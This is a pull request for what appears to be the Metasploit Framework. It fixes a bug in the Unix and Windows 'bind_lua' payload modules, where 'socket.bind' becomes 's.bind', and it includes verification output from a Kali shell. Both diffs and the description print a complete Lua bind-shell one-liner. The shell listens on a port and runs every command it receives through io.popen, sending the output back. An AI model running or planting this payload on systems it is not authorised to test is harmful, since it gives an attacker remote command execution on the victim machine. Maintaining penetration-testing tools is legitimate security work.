### PR TITLE
fix bind_lua

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_lua.rb
+++ b/modules/payloads/singles/cmd/unix/bind_lua.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 223
+  CachedSize = 218
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/unix/bind_lua.rb
+++ b/modules/payloads/singles/cmd/unix/bind_lua.rb
@@ -48,7 +48,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local s=assert(socket.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
+    "lua -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
   end
 end
 

--- a/modules/payloads/singles/cmd/windows/bind_lua.rb
+++ b/modules/payloads/singles/cmd/windows/bind_lua.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 223
+  CachedSize = 218
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/windows/bind_lua.rb
+++ b/modules/payloads/singles/cmd/windows/bind_lua.rb
@@ -48,7 +48,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local s=assert(socket.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
+    "lua -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
   end
 end
 


### PR DESCRIPTION
fix bind_lua

## Verification
```shell
root@kali:~# lua -e "local s=require('socket');local s=assert(socket.bind('*',4444));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();"
lua: (command line):1: attempt to index a nil value (global 'socket')
stack traceback:
        (command line):1: in main chunk
        [C]: in ?
```

